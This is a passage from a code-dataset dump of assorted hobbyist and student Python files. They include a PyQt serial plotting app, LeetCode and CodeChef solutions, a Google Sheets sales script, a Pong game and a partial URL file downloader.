№{}\".format(self.record_number))\r\n\t\tself.curve.curve.setClickable(True)\r\n\r\n\t\tself.curve.sigPointsClicked.connect(self.clicked_point)\t\r\n\r\n\tdef closeEvent(self, event):#перехватываем событие закрытия приложения\r\n\t\tresult = QtWidgets.QMessageBox.question(self, \"Подтверждение закрытия окна\", \"Вы действительно хотите закрыть окно?\", QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No )\r\n\t\tif result == QtWidgets.QMessageBox.Yes:\r\n\t\t\tself.hide()\r\n\t\t\t#self.pwindow.close()\r\n\t\t\tself.meas_thread.running = False\r\n\t\t\tself.meas_thread.wait(5000)#ms\r\n\t\t\tevent.accept()\r\n\t\telse:\r\n\t\t\tevent.ignore()\r\n\t\t\r\n\tdef clicked_point(self, plot, points):\r\n\t\tglobal lastClicked\r\n\t\tif self.last_clicked_plot == self.current_row:\r\n\t\t\ttry:\r\n\t\t\t\tfor p in self.lastClicked:\r\n\t\t\t\t\tp.resetPen()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\tif self.last_clicked_plot != self.current_row:\r\n\t\t\tself.cursor_trigger = 0\r\n\t\tif self.cursor_trigger == 0:\r\n\t\t\tself.xpos = int(points[0].pos()[0]/self.record_sampling_time)\r\n\t\t\tself.ypos = int(points[0].pos()[1])\r\n\t\t\t#self.label_cord.setText(\"X pos: {:03d} Y pos: {:04d} Time: {:0.2f}sec\".format(self.xpos, self.ypos, self.xpos*self.record_sampling_time))\r\n\r\n\t\t\tfor p in points:\r\n\t\t\t\tp.setPen(pg.mkPen(color='r', width=4)) #'r', width=5)\r\n\t\tself.lastClicked = points\r\n\t\tself.last_clicked_plot = self.current_row\t\r\n\t\tself.cursor_trigger += 1\r\n\t\tif self.cursor_trigger >= 2:\r\n\t\t\tself.cursor_trigger = 0\r\n\r\n\t\tself.vLine.setPos(points[0].pos()[0])\r\n\t\ttry:\r\n\t\t\tself.hLine.setPos(self.parsed_data_list[self.current_row][self.xpos])\r\n\t\texcept:\r\n\t\t\tpass#print(\"x pos out of range\")\r\n\tdef crc16(self, data: bytes, poly=0xa001):\r\n\t '''\r\n\t CRC-16-CCITT Algorithm\r\n\t '''\r\n\t data = bytearray(data)\r\n\t crc = 0xFFFF\r\n\t for b in data:\r\n\t cur_byte = 0xFF & b\r\n\t for _ in range(0, 8):\r\n\t if (crc & 0x0001) ^ (cur_byte & 0x0001):\r\n\t crc = (crc >> 1) ^ poly\r\n\t else:\r\n\t crc >>= 1\r\n\t cur_byte >>= 1\r\n\t crc = (~crc & 0xFFFF)\r\n\t crc = (crc << 8) | ((crc >> 8) & 0xFF)\r\n\t \r\n\t return crc & 0xFFFF\t\t\t\r\n\tdef calcByte(self, ch, crc):\r\n\t \"\"\"Given a new Byte and previous CRC, Calc a new CRC-16\"\"\"\r\n\t if type(ch) == type(\"c\"):\r\n\t by = ord( ch)\r\n\t else:\r\n\t by = ch\r\n\t crc = (crc >> 8) ^ self.table[(crc ^ by) & 0xFF]\r\n\t return (crc & 0xFFFF)\r\n\r\n\tdef calcString(self, st, crc):\r\n\t \"\"\"Given a binary string and starting CRC, Calc a final CRC-16 \"\"\"\r\n\t for ch in st:\r\n\t crc = (crc >> 8) ^ self.table[(crc ^ (ch)) & 0xFF] #ord(ch) \r\n\t return crc\r\nclass evThread(QtCore.QThread):\r\n\t\r\n\tstatus_signal = QtCore.pyqtSignal(str)\r\n\tdataplot = QtCore.pyqtSignal(int)\r\n\tprogress = QtCore.pyqtSignal(int)\r\n\tdataplot_array = QtCore.pyqtSignal(list)\r\n\r\n\tdef __init__(self, parent = None):\r\n\t\tQtCore.QThread.__init__(self,parent)\r\n\t\tself.running = False\r\n\t\tself.ComPort = str\r\n\t\tself.data = 0\r\n\t\tself.data_array = list()\r\n\t\t\r\n\tdef run(self):\r\n\t\tself.running = True\r\n\t\twhile self.running == True:\r\n\t\t\tif self.running == True:\r\n\t\t\t\tself.data_array = list()\r\n\t\t\t\tfor i in range(1000):\r\n\t\t\t\t\tself.data = int.from_bytes((self.ser.read(1)), byteorder='big', signed=False)#100*np.random.random(1)#\r\n\t\t\t\t\tself.data_array.append(self.data)\r\n\t\t\t\tself.dataplot_array.emit(self.data_array)\r\n\t\t\t\tself.status_signal.emit(\"in progress\")\r\n\t\t\tif self.running == False:\r\n\t\t\t\tself.status_signal.emit(\"Interrupted\")\r\n\r\n\tdef on_connected(self, comport):\r\n\t\ttry:\r\n\t\t\tself.ComPort = comport\r\n\t\t\tself.ser = serial.Serial(self.ComPort, baudrate=921600, bytesize=serial.EIGHTBITS,\r\n\t\t\t\t\t\t\t\t\t parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout = 0.01)\r\n\t\t\tself.ser.isOpen() # try to open port\r\n\t\t\tself.serialDeviceConnected = True\r\n\t\texcept IOError:\r\n\t\t\tprint(\"Port already open another programm\")\r\n\t\texcept serial.SerialException:\r\n\t\t\tprint(\"SerialException\")\r\n\t\t\t#self.log_widget.appendPlainText(\"[{}] SerialException\".format(strftime(\"%H:%M:%S\")))\r\n\t\t#except Exception:\r\n\t\t\t#print(\"Unexpected error, Null ComName\")\r\n\t\t\t#self.log_widget.appendPlainText(\"[{}] unexpected error\".format(strftime(\"%H:%M:%S\")))\r\n\tdef on_disconnected(self):\r\n\t\tself.serialDeviceConnected = False\r\n\t\t#self.log_widget.appendPlainText(\"[{}] Disconnected\".format(strftime(\"%H:%M:%S\")))\r\n\t\ttry:\t\r\n\t\t\tself.ser.close()\r\n\t\texcept:\r\n\t\t\tprint(\"serial port close exception, on_disconnect --traceback\")\r\n\t\t\t#self.log_widget.appendPlainText(\"[{}] error, device session lost\".format(strftime(\"%H:%M:%S\")))\r\n\t\t#print(\"Disconnected\")\r\n\t\t\t\r\n\tdef on_activated_com_list(self, str):\r\n\t\tif self.comport_combo.currentText() == \"\" or self.serialDeviceConnected == True:\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\telif self.comport_combo.currentText() == \"Refresh\":\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\t\tself.comport_combo.clear()\r\n\t\t\tself.comport_combo.addItems([\"\"])\r\n\t\t\tself.comport_combo.addItems([\"Refresh\"])\r\n\t\t\tself.comport_combo.addItems(serial_ports())\r\n\t\telse:\r\n\t\t\tself.ComPort = str\r\n\t\t\tself.btn_visa_connect.setDisabled(False)\r\n\r\n\r\n\t\t\r\nclass ppData:\r\n\t\"\"\"this class will be used for post processing of data\"\"\"\r\n\tdef __init__(self, parent = None):\r\n\t\tdataFromFile = (list)\r\n\r\n\r\ndef serial_ports():\r\n\t\"\"\" Lists serial port names\r\n\t\t:raises EnvironmentError:\r\n\t\t\tOn unsupported or unknown platforms\r\n\t\t:returns:\r\n\t\t\tA list of the serial ports available on the system\r\n\t\"\"\"\r\n\tif sys.platform.startswith('win'):\r\n\t\tports = ['COM%s' % (i + 1) for i in range(256)]\r\n\telif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\r\n\t\t# this excludes your current terminal \"/dev/tty\"\r\n\t\tports = glob.glob('/dev/tty[A-Za-z]*')\r\n\telif sys.platform.startswith('darwin'):\r\n\t\tports = glob.glob('/dev/tty.*')\r\n\telse:\r\n\t\traise EnvironmentError('Unsupported platform')\r\n\r\n\tresult = []\r\n\tfor port in ports:\r\n\t\ttry:\r\n\t\t\ts = serial.Serial(port)\r\n\t\t\ts.close()\r\n\t\t\tresult.append(port)\r\n\t\texcept (OSError, serial.SerialException):\r\n\t\t\tpass\r\n\treturn result\t\t\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try:\r\n # PyInstaller creates a temp folder and stores path in _MEIPASS\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\t\t\r\n\r\nif __name__ == '__main__':\r\n\timport sys\r\n\timport time, math\r\n\r\n\tapp =QtWidgets.QApplication(sys.argv)\r\n\tex = CommonWindow()\r\n\tex.setFont(QtGui.QFont('Arial', 9))#, QtGui.QFont.Bold\r\n\tex.setWindowTitle(\"Milk fetch ver 1.0.0\")\r\n\t#app.setStyle('Fusion')\r\n\tapp.setStyleSheet ( qdarkstyle . load_stylesheet ())\r\n\t#ex.setWindowFlags(ex.windowFlags() | QtCore.Qt.FramelessWindowHint)\r\n\tex.comport_combo.addItems(serial_ports())\r\n\t#ex.setFixedSize(500,400)\r\n\t#ex.resize(300,200)\r\n\tex.adjustSize()\r\n\t#ico = QtGui.QIcon(\"icon.png\")\r\n\t#ex.setWindowIcon(ico)#icon for window only\r\n\t#app.setWindowIcon(ico)#icon for application\r\n\t#if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\r\n # \tQtGui.QApplication.instance().exec_()\r\n\tex.show()\r\n\tsys.exit(app.exec_())#run the cycle of processing the events\r\n\t","repo_name":"LittleHorus/CommonRep","sub_path":"MilkFetch.py","file_name":"MilkFetch.py","file_ext":"py","file_size_in_byte":33028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41076861683","text":"from collections import defaultdict\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n sol = defaultdict(list)\n for strs_ in strs:\n letters = [0]*26\n for s_ in strs_:\n letters[ord(s_)-ord('a')] += 1\n sol[tuple(letters)].append(strs_)\n return sol.values()\n \n \n ","repo_name":"anna-helena/LeetCode","sub_path":"0049-group-anagrams/0049-group-anagrams.py","file_name":"0049-group-anagrams.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41452463693","text":"class partyAnimal:\n\tx = 0\n\tname = \"\"\n\tdef __init__(self,name):\n\t\tself.name = name\n\t\tprint(\"i am constructude my name is\",name)\t\t\n\n\tdef party(self):\n\t\tself.x = self.x + 1\n\t\tprint(\"x val:\",self.x)\n\n\tdef __del__(self):\n\t\tprint(self.name,\"is distructed x is\",self.x)\n\n\nclass FootballFan(partyAnimal):\n\tpoints = 0\n\tdef touchDown(self):\n\t\tself.points = self.points + 7\n\t\tself.party()\n\t\tprint(self.name,\"points:\",self.points)\n\nobj1=partyAnimal(\"Sudesh\")\nobj2=partyAnimal(\"Madu\")\n\nobj1.party()\nobj1.party()\nobj2.party()","repo_name":"sudeshm99/Python-Specialization-Repo","sub_path":"inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27688392810","text":"from __future__ import print_function\nfrom setuptools import setup\nfrom build_utils import BuildCommand\nfrom build_utils import PublishCommand\nfrom build_utils import BinaryDistribution\n\n\nPACKAGE_NAME = 'flask_pycreate2'\nVERSION = '0.0.1'\nBuildCommand.pkg = PACKAGE_NAME\nPublishCommand.pkg = PACKAGE_NAME\nPublishCommand.version = VERSION\n\n\nsetup(\n\tauthor='Isaac Tan',\n\tauthor_email='',\n\tname=PACKAGE_NAME,\n\tversion=VERSION,\n\tdescription='A library to control mBot Ranger robots using Python Flask to provide a Web API for invoking the pycreate2 package developed by Kevin Walchko',\n\turl='http://github.com/isaactps/{}'.format(PACKAGE_NAME),\n\tclassifiers=[\n\t\t'Development Status :: 1 - Beta',\n\t\t'Intended Audience :: Developers',\n\t\t'License :: OSI Approved :: MIT License',\n\t\t'Operating System :: Ubuntu',\n\t\t'Programming Language :: Python :: 3.6',\n\t\t'Topic :: Software Development :: Libraries',\n\t\t'Topic :: Software Development :: Libraries :: Python Modules',\n\t\t'Topic :: Software Development :: Libraries :: Application Frameworks'\n\t],\n\tlicense='MIT',\n\tkeywords=['mBot Ranger', 'pycreate2', 'api', 'flask', 'library', 'robotics', 'robot'],\n\tpackages=[PACKAGE_NAME],\n\tinstall_requires=open('requirements.txt').readlines(),\n\tscripts=[]\n)\n","repo_name":"isaactps/Yoshimi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38720316768","text":"from step_up.database import get_database\n\n\ndef steps_calculator(userid):\n # Get handle on DB\n database = get_database()\n # Get info from the database\n user_info = database.execute(\n \"SELECT sex, current_weight, target_weight, body_fat_per FROM user WHERE userid = ?\", (userid,)\n ).fetchone()\n\n sex = user_info['sex']\n current_weight = user_info['current_weight']\n target_weight = user_info['target_weight']\n body_fat_per = user_info['body_fat_per']\n\n # conversion for kilograms from pounds: '/ 2.205'\n current_weight_kg = current_weight / 2.205\n # calculates the current fat mass (30?)\n current_fat_mass = (body_fat_per * 0.01) * current_weight_kg\n # converts the target weight loss into decimal (7.2?)\n target_weight_loss = current_weight_kg * (target_weight * .01)\n # target weight in kg\n target_body_weight = current_weight_kg - target_weight_loss\n # temporary new fat mass\n new_fat_mass = current_fat_mass - target_weight_loss\n # target body fat percentage\n target_body_fat = (new_fat_mass / target_body_weight) * 100\n # Holding for later... current_fat_free_mass = current_weight_kg - current_fat_mass\n\n if sex == 'female':\n power_regression = 261425.4 / (target_body_fat ** 1.8797)\n daily_steps = power_regression * current_fat_mass\n else:\n power_regression = 39377.34 / (target_body_fat ** 1.3405)\n daily_steps = power_regression * current_fat_mass\n\n int(daily_steps)\n\n # Adds value to the database\n database.execute(\n \"UPDATE user SET steps = ? WHERE userid = ?\", (daily_steps, userid))\n database.commit()\n\n\ndef get_steps(userid):\n # Get a handle on the db\n database = get_database()\n\n # Get current steps\n step = database.execute(\n \"Select steps FROM user where userid = ?\", (userid,)\n ).fetchone()\n\n steps = int(step['steps'])\n\n # if steps == 0:\n # steps = \"Click on 'Survey' to calculate your steps!\"\n\n return steps\n\n\ndef get_user(userid):\n database = get_database()\n user = database.execute(\n \"Select * FROM user where userid = ?\", (userid,)\n ).fetchone()\n return user\n","repo_name":"KSU-Capstone-Team-2/StepUp","sub_path":"step_up/formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74458750336","text":"import config\nimport fasttext\nimport numpy as np\nimport pandas as pd\nfrom annoy import AnnoyIndex\nfrom gensim.models import KeyedVectors\nfrom scipy.spatial import cKDTree\nfrom tqdm import tqdm\n\n# ============================================================\n# Script purpose:\n# Use nearest-neighbor word embeddings to find suggested words\n# ============================================================\n\n# number of nearest-neighbor words to save\nNUM_NEAREST = 16\n\n# python reduce_model.py ./data/raw/cc.zh.300.bin 100\n# zh_model = fasttext.load_model(\"./data/raw/cc.zh.100.bin\")\ntencent_vectors = KeyedVectors.load(\"data/intermediate/tencent_vectors\", mmap=\"r\")\nvocab = set(tencent_vectors.wv.vocab.keys())\n\ncedict = pd.read_csv(f\"./data/intermediate/cedict.txt\", sep=\"\\t\", index_col=0)\n\n# unify simplified+traditional words\nwords = list(set(cedict[\"simplified\"]) | set(cedict[\"traditional\"]))\n\n# compute embeddings\nembedded_words = []\nword_index = 0\n\nnn_index = AnnoyIndex(200, \"angular\")\n\nprint(\"Constructing nn index\")\nfor word in tqdm(words):\n if word in vocab:\n word_embedding = tencent_vectors.wv.word_vec(word)\n\n nn_index.add_item(word_index, word_embedding)\n embedded_words.append(word)\n\n word_index += 1\n\nnn_index.build(256)\n\nnearest_indices = []\nnearest_dists = []\n\nprint(\"Retrieving nearest neighbors\")\nfor word_idx, word in tqdm(enumerate(embedded_words), total=len(embedded_words),):\n indices, dists = nn_index.get_nns_by_item(\n word_idx, n=NUM_NEAREST + 1, include_distances=True\n )\n\n # remove query itself\n indices = indices[1:]\n dists = dists[1:]\n\n nearest_indices.append(indices)\n nearest_dists.append(dists)\n\n# convert embedding distances and nearest-words to dataframe\nprint(\"Exporting results\")\nembeddings_dists = pd.DataFrame(nearest_dists, index=embedded_words)\nembeddings_nearest = pd.DataFrame(nearest_indices, index=embedded_words)\nembeddings_nearest = embeddings_nearest.applymap(lambda x: embedded_words[x])\n\nembeddings_dists.to_hdf(\n \"./data/intermediate/embeddings_dists.h5\",\n key=\"embeddings_dists\",\n complevel=config.HDF_COMPLEVEL,\n complib=config.HDF_COMPLIB,\n mode=\"w\",\n)\n\nembeddings_nearest.to_hdf(\n \"./data/intermediate/embeddings_nearest.h5\",\n key=\"embeddings_nearest\",\n complevel=config.HDF_COMPLEVEL,\n complib=config.HDF_COMPLIB,\n mode=\"w\",\n)\n","repo_name":"kevinhu/hotpot","sub_path":"dictionary/7_word2vec_similars.py","file_name":"7_word2vec_similars.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"7662079870","text":"# Write your code to expect a terminal of 80 characters wide and 24 rows high\nimport gspread\nfrom google.oauth2.service_account import Credentials\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n ]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('love_sandwiches')\n\n\ndef get_sales_data():\n \"\"\"\n Get sales figures input from the user\n Run a whileloop to collect a valid string of data from the user via\n the terminal, which must be a string of 6 numbers separated by commas. The\n loop will repeatedly request data until it is valid.\n \"\"\"\n while True:\n print('Please enter sales data from the most recent market!')\n print('Data should consist of six numbers, separated by commas...')\n print('e.g. 10,20,30,40,50,60\\n')\n\n data_str = input('Enter your data here:\\n')\n sales_data = data_str.split(',')\n\n if validate_data(sales_data):\n print('Data is valid!')\n break\n\n return sales_data\n\n\ndef validate_data(values):\n \"\"\"\n Inside the try clause, converts all string values into integers.\n Raises a ValueError if strings can't be converted into integers,\n or if there aren't exactly 6 values...\n \"\"\"\n try:\n [int(value) for value in values]\n if len(values) != 6:\n raise ValueError(\n f'Exactly 6 values are required - you provided {len(values)}'\n )\n except ValueError as e:\n print(f'Invalid data entered: {e}, please try again!\\n')\n return False\n\n return True\n\n\n# def update_sales_worksheet(data):\n# \"\"\"\n# Update sales worksheet, add new row with the user list data provided\n# \"\"\"\n# print('Updating sales worksheet...\\n')\n# sales_worksheet = SHEET.worksheet('sales')\n# sales_worksheet.append_row(data)\n# print('Sales worksheet updated successfully!...\\n')\n\n\n# def update_surplus_worksheet(data):\n# \"\"\"\n# Update surplus worksheet, add new row with the surplus\n# sandwich quantities\n# calculated\n# \"\"\"\n# print('Updating surplus worksheet...\\n')\n# surplus_worksheet = SHEET.worksheet('surplus')\n# surplus_worksheet.append_row(data)\n# print('Surplus worksheet updated successfully!...\\n')\n\n\n# NB: Refactored utility fn instead of the two v similar fns above\ndef update_worksheet(data, worksheet):\n \"\"\"\n Receive a list of integers to be inserted into a designated worksheet\n Update the relevant worksheet of the love_sandwiches spreadsheet with the\n data provided\n \"\"\"\n print(f'Updating {worksheet} worksheet...\\n')\n worksheet_to_be_updated = SHEET.worksheet(worksheet)\n worksheet_to_be_updated.append_row(data)\n print(f'{worksheet} worksheet updated successfully!...\\n')\n\n\ndef calculate_surplus_sandwiches(data):\n \"\"\"\n Compare sales with stock and calculate surplus for each sandwich type...\n Surplus = sales - stock for that particular sandwich\n - Positive surplus indicates waste\n - Negative surplus indicates extra sandwiches made when stock was sold out\n \"\"\"\n print('Calculating surplus sandwiches...\\n')\n stock = SHEET.worksheet('stock').get_all_values()\n stock_row = stock[-1]\n surplus_data = []\n for stock, item in zip(stock_row, data):\n surplus = int(stock) - item\n surplus_data.append(surplus)\n return surplus_data\n\n\ndef get_last_five_sales_entries():\n \"\"\"\n Collects cols of data from sales worksheet, collecting the last\n five entries for each sandwich, and returns a list of lists\n \"\"\"\n sales_worksheet = SHEET.worksheet('sales')\n list_of_last_fives = []\n for num in range(1, 7):\n col = sales_worksheet.col_values(num)\n last_five = col[-5:]\n list_of_last_fives.append(last_five)\n\n return list_of_last_fives\n\n\ndef get_average_sales(data):\n \"\"\"\n Calculate average sales data (+10%) for each sandwich type\n \"\"\"\n print(\"Calculating stock data...\\n\")\n avg_sales = []\n for list in data:\n int_list_avg = sum(int(item) for item in list) / len(list)\n avg_plus_extra = round(int_list_avg * 1.1)\n avg_sales.append(avg_plus_extra)\n\n return avg_sales\n\n\ndef main():\n \"\"\"\n All main fn calls go here...\n \"\"\"\n data = get_sales_data()\n sales_data = [int(num) for num in data]\n update_worksheet(sales_data, 'sales')\n new_surplus_data = calculate_surplus_sandwiches(sales_data)\n update_worksheet(new_surplus_data, 'surplus')\n list_of_last_five_sales = get_last_five_sales_entries()\n stock_data = get_average_sales(list_of_last_five_sales)\n update_worksheet(stock_data, 'stock')\n return stock_data\n\n\nprint(\"Welcome to Love Sandwiches data automation.\\n\")\nstock_data = main()\n\n\n# Write you code below this comment\ndef get_stock_values(data):\n stock = SHEET.worksheet(\"stock\")\n headings = []\n for ind in range(1, 7):\n column = stock.col_values(ind)\n headings.append(column[0])\n dictionary = dict(zip(headings, data))\n return dictionary\n\n\nstock_values = get_stock_values(stock_data)\nprint(\"Make the following numbers of sandwiches for next market:\\n\")\nprint(stock_values)\n","repo_name":"loosenthedark/CI_python-essentials_love-sandwiches-walkthrough-project","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31670929741","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\n\n#case 1\n#X has more Independent Feature as Compare to Y Dependent Feature\ndataset=pd.read_csv(\"50_Startups.csv\")\nx=dataset.iloc[:,:-1].values\ny=dataset.iloc[:,4].values\n\nprint(dataset.head())\n\n#Encoding categoical Data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabel_encoder=LabelEncoder()\nx[:,3]=label_encoder.fit_transform(x[:,3])\n#String Category Column wise\nonehotencoder = OneHotEncoder(categorical_features = [3])\nx=onehotencoder.fit_transform(x).toarray()\n\n#Avoiding Dummmy Variable Trap\nx=x[:,1:]\n\n#Spltting tge model in to Train and Test\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0)\n\n#Linear Regression Class\nfrom sklearn.linear_model import LinearRegression\nreg=LinearRegression()\nreg.fit(X_train,y_train)\n#predict the output variable\ny_pred=reg.predict(X_test)\n\nprint(\"Y_train\",y_test)\nprint(\"y Pred\",y_pred)\n# m=len(x)\n# x=x.reshape(m,1)\n# y=y.reshape(m,1)\n'''color=np.random.randint(4)\nreg.fit(x, y)\ny_pred = reg.predict(x)\n\nplt.plot(x,y_pred)\nprint(y_pred)\n#plt.xlabel(i)\nplt.ylabel(\"Profit\")\nplt.title(\" Against Profit\")\nplt.show()\n'''\n#Equation coefficient and Intercept\nprint('Coefficient: \\n', reg.coef_)\nprint('Intercept: \\n', reg.intercept_)\n#ordiratory leanear square to find the least sum (y-y`)2 =>min\nr2=reg.score(X_test,y_pred)\nprint('R Sqaure Score', r2)\n\n\n","repo_name":"akbarbelif/Bridge-Labz-Python-ML","sub_path":"Regression/Multiple Linear Regression/PredictCompanyProfit.py","file_name":"PredictCompanyProfit.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7367465624","text":"# Maryan Maxwell\n# CSCI 101 - Section D\n# Lab 4 - Timber Regrowth\n# References: N/A\n# Time: 1hr 10mins\n\nimport math\n\nyears = int(input(\"YEARS> \"))\nrate = float(input(\"RATE> \"))\nog_acres = float(input(\"ACRES> \"))\n\nacres = og_acres\npercent_forest = 100 * (acres / 20000)\nprint(f\"OUTPUT 0, {acres:.1f}, {percent_forest:.2f}\")\n \nfor i in range(1, years + 1):\n forest = acres + ((rate/100) * acres)\n acres = forest\n percent_forest = 100 * (forest / 20000)\n print(f\"OUTPUT {i}, {acres:.1f}, {percent_forest:.2f}%\")\n\nacres = og_acres\n\nyears_elapsed = 0\nwhile acres < 20000:\n acres = (((rate/100) + 1) * acres)\n years_elapsed = years_elapsed + 1\n\nprint(f\"OUTPUT {years_elapsed}\")\n","repo_name":"MaxwellEnough/CSCI101102Labs","sub_path":"Lab4-TimberRegrowth.py","file_name":"Lab4-TimberRegrowth.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35543434749","text":"import time\nfrom turtle import Screen\nfrom score import Score\nfrom centerline import Centerline\n\nfrom ball import Ball\nfrom paddle import Paddle\n\nplayer_1 = Paddle(1)\nplayer_2 = Paddle(-1)\npaddles = [player_1, player_2]\nball = Ball()\nscoreboard = Score()\ncenterline = Centerline()\n\nscreen = Screen()\nscreen.setup(width=640, height=480)\nscreen.bgcolor('black')\nscreen.tracer(0)\nscreen.listen()\nscreen.onkey(fun=player_1.set_north, key='w')\nscreen.onkey(fun=player_1.set_south, key='s')\nscreen.onkey(fun=player_2.set_north, key='i')\nscreen.onkey(fun=player_2.set_south, key='k')\nscreen.onkey(fun=screen.bye, key='y')\n\n\ngame_running = True\nwhile game_running:\n time.sleep(0.05)\n screen.update()\n player_1.move()\n player_2.move()\n ball.bounce_paddles(paddles)\n ball.move()\n\n bounds = ball.check_horizontal_bounds()\n if bounds == 1:\n scoreboard.scorep1 += 1\n elif bounds == 2:\n scoreboard.scorep2 += 1\n\n scoreboard.update_score()\n\n\n\nscreen.exitonclick()","repo_name":"HGieselmann/HunderedDaysOfPython","sub_path":"day22-Pong/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"279068052","text":"import customtkinter as ctk\nfrom ..settings import *\n\n\nclass SmallLabelButton(ctk.CTkButton):\n def __init__(self,\n master,\n fg_color=\"transparent\",\n border_spacing=3,\n **kwargs):\n super().__init__(master,\n fg_color=fg_color,\n hover=False,\n border_width=0,\n text_color=LABEL_BUTTON_TEXT_COLOR,\n border_spacing=border_spacing,\n **kwargs)\n\n self.button_font = ctk.CTkFont(**SMALL_LABEL_FONT)\n self.configure(font=self.button_font)\n\n self.bind(\"\", lambda event: self.set_hover())\n self.bind(\"\", lambda event: self.unset_hover())\n\n def set_hover(self):\n self.button_font.configure(underline=True)\n self.configure(cursor=\"hand2\")\n\n def unset_hover(self):\n self.button_font.configure(underline=False)\n","repo_name":"bilboderbyshire/school-report-writer","sub_path":"scripts/components/small_label_button.py","file_name":"small_label_button.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24858927070","text":"\"\"\"\nRuns simulate_train_loop.py with a wrapper that fixes a bug in the code.\nThis runs the code for as long as there are new files coming in to the dataset, i.e. the process is not hanging.\n\"\"\"\nimport os\n\nimport os\nimport sys\nimport time\nimport subprocess\nfrom simulate_train_loop import SIMULATING_GAMES_FLAG\n\ndef get_time_from_latest_change(folder):\n \"\"\" Return the time in seconds, since the last change to the folder.\"\"\"\n last_changed = os.path.getmtime(folder)\n return time.time() - last_changed\n\ndef kill_process(p):\n while p.poll() is None:\n p.kill()\n time.sleep(1)\n print(\"Process killed.\")\n\nif __name__ == \"__main__\":\n stdout_file = \"simulate_train_loop_stdout.txt\"\n for i in range(10):\n KILLED_PROCESS = False\n print(f\"Starting iteration {i}\")\n py_exe = sys.executable\n # Start the process\n # Write the stdout to a file\n with open(stdout_file,\"a\") as f:\n p = subprocess.Popen([py_exe,os.path.abspath(\"./ModelTraining/simulate_train_loop.py\")], stdout=f, stderr=f)\n # Start monitoring file changes WHEN the process is in simulation stage\n time.sleep(10)\n while SIMULATING_GAMES_FLAG:\n # If there are no changes for 60 seconds, the proces is hanging. Kill it.\n if get_time_from_latest_change(\"./NotRandomDataset_1\") > 60:\n print(\"No changes for 60 seconds. Killing process.\")\n kill_process(p)\n KILLED_PROCESS = True\n break\n time.sleep(10)\n \n \n \n ","repo_name":"ilmari99/MoskaResearch","sub_path":"ModelTraining/simulate_train_loop_bug_wrapper_fix.py","file_name":"simulate_train_loop_bug_wrapper_fix.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1532575935","text":"# https://www.codechef.com/practice\n\n\nT = int(input())\nwhile T:\n A= input()\n A = int(A)\n ten = A*10//100\n hundred = 100 \n if ten > hundred:\n print(ten)\n else:\n print(hundred)\n T=T-1\n","repo_name":"Niyaj-Kumanali/CodeChef-Python","sub_path":"CHEAPFOOD.py","file_name":"CHEAPFOOD.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"72327785856","text":"import urllib.request\nfrom html.parser import HTMLParser\nimport os\n\n\nclass CatchStartTag(HTMLParser):\n def __init__(self, href_callback):\n super().__init__()\n self.href_callback = href_callback\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n self.href_callback(dict(attrs)['href'])\n\n\ndef download_files_in_url(start_url, start_folder):\n todo = []\n\n def add(u, f):\n print(u, f)\n todo.append((u, f))\n\n add(start_url, start_folder)\n while len(todo) > 0:\n url, folder = todo.pop()\n if url.endswith('/'):\n with urllib.request.urlopen(url) as fp:\n html = 